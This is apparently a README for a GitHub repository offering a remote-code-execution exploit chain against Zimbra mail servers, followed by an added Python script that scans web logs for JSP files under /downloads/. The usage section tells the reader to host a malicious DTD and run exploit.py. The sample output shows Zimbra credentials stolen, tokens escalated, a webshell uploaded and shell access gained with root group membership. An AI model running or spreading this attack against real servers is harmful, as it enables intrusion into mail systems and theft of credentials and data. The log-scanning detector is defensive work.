Zimbra-RCE-exploit

RCE exploit for the attack chain described in the "A Saga of Code Executions on Zimbra" post. Tested with Zimbra 8.6.0 and 8.7.11.

Usage:

$ git clone https://github.com/nth347/Zimbra-RCE-exploit.git
$ cd Zimbra-RCE-exploit/
$ # Edit "Target configuration" part, host the "malicious_dtd" file on a webserver
$ chmod +x exploit.py
$ ./exploit.py

Example:

$ ./exploit.py                   
[i] Getting Zimbra credentials
[+] Got credentials: zimbra:XXXXXX

[i] Getting low-privilege token
[+] Got low-privilege token: XXXXX

[i] Getting high-privilege token
[+] Got high-privilege token: XXXXX

[i] Uploading webshell
[+] Uploaded webshell. Location https://mail.test.com/downloads/shell.jsp

webshell@target$ id
uid=999(zimbra) gid=999(zimbra) groups=999(zimbra),0(root)
webshell@target$ 
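For defenders, the final stage in the output above leaves a JSP file reachable under /downloads/, which is visible in web access logs. The following is an added example, not part of this repository: it flags requests for JSP files under that path, and it assumes combined log format, constructed sample lines, and the hypothetical names find_jsp_hits and watched_prefix.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2019:10:01:02 +0000] "GET /downloads/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2019:10:04:40 +0000] "GET /downloads/shell.jsp HTTP/1.1" 200 48 "-" "python-requests/2.21"
203.0.113.9 - - [12/Mar/2019:10:04:44 +0000] "POST /downloads/Shell.JSP;x=1?a=1 HTTP/1.1" 200 91 "-" "python-requests/2.21"
198.51.100.7 - - [12/Mar/2019:10:05:10 +0000] "GET /downloads/%73tatus.jspx HTTP/1.1" 404 0 "-" "curl/7.64"
198.51.100.7 - - [12/Mar/2019:10:06:00 +0000] "GET /other/page.jsp HTTP/1.1" 200 10 "-" "Mozilla/5.0"
"""

# Assumed log layout: ip ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
SCRIPT_EXT = re.compile(r"\.jspx?$", re.IGNORECASE)


def find_jsp_hits(log_text, watched_prefix="/downloads/"):
    """Return requests for JSP files under a path that should hold only static files."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        # Normalise before matching: drop the query string, decode
        # percent-escapes, and strip ";param" suffixes from each segment.
        path = unquote(urlsplit(m["target"]).path)
        path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
        if path.lower().startswith(watched_prefix) and SCRIPT_EXT.search(path):
            hits.append({
                "ip": m["ip"],
                "time": m["ts"],
                "method": m["method"],
                "path": path,
                "served": m["status"] == "200",  # True if the file exists and ran
            })
    return hits


if __name__ == "__main__":
    for hit in find_jsp_hits(SAMPLE_LOG):
        print(hit)
```

Hits with `served` set to False are probes for files that were not present; hits with it set to True warrant checking the file on disk and the source address's earlier requests.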

Reference: